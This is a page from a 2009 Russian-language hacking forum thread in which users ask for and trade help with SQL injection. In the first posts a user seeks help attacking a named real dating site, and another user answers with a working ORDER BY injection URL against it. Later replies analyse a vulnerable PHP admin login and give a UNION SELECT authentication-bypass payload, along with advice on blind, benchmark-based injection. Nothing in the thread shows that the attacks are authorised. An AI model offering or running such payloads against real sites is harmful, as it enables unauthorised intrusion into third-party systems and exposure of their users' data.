HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 736 из 2422 « Первая < 236636686726 732 733 734 735 736 737 738 739 740 74678683612361736 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.06.2009, 11:30
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
Провел на форуме:
178075

Репутация: 85
Отправить сообщение для ^YaHoo^ с помощью ICQ
По умолчанию
Зравсвуйте вот нашел сайтец http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&on line_only=1&search=1&age_start=1'&age_end=1&countr y=1 помогите пожалуйста пытаюсь подобрать кол-во полей ни как ни могу перечитал все статьи по sql инъекциям.
 

  #2  
Старый 03.06.2009, 11:45
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию
2^YaHoo^
http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&on line_only=1&search=1&age_start=1)))+order+by+1000+--+&age_end=1&country=1
дальше сам)
 

  #3  
Старый 03.06.2009, 17:13
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
Всем привет, у меня такой вопрос, можно ли как нибудь попасть в админ панель.
Как я вижу, что авторизация проходит так: в БД ищется юзер с соответсвующем поролем из БД.
А дальше я понять не чего не могу

PHP код:


$login $_GET['login'];
$pass $_GET['p'];

$result mysql_query("SELECT `pass` FROM `superadmin` WHERE `login`='$login';");
$row=mysql_fetch_row($result);
if(!empty($row))
{
 $truepass $row[0];
 if ($truepass == $pass || $truepass == md5($pass))

 {
  // вход осуществлен
 else
 {
//неверный пароль
break;
 }

else
  {
  //неверный пароль
  
помогите пожалуйсто разобраться
 

  #4  
Старый 03.06.2009, 17:18
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Уязвимый скрипт у тебя... SQL-инъекция там..
 

  #5  
Старый 03.06.2009, 17:25
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
mailbrush,можеш носом меня тыкнуть, где там уязвимость и как ей воспользоватся?
 

  #6  
Старый 03.06.2009, 17:33
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию
2 SeNaP
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк
Последний раз редактировалось Iceangel_; 03.06.2009 в 17:38..
 

  #7  
Старый 03.06.2009, 17:33
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
2 SeNaP

Там то, что вернет запрос (пароль) должно соответствовать тому, что в переменной p

При волшебных_кавычках = офф

login.php?login=-1'+union+select+123--+&p=123

Вроде так, если я не накосячил
 

  #8  
Старый 03.06.2009, 18:56
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
Понял одно, что один уязвимый параметр это login
Последний раз редактировалось SeNaP; 03.06.2009 в 19:00..
 

  #9  
Старый 03.06.2009, 19:37
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию
А чего те не понятно....
Товарищь Iceangel_ тебе же написал....
Цитата:
Iceangel_
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк
 

  #10  
Старый 03.06.2009, 19:51
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
Можете хотябы пример написать как крутить.... пожалуйсто
Последний раз редактировалось SeNaP; 03.06.2009 в 19:54..
 
 
Страница 736 из 2422 « Первая < 236636686726 732 733 734 735 736 737 738 739 740 74678683612361736 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ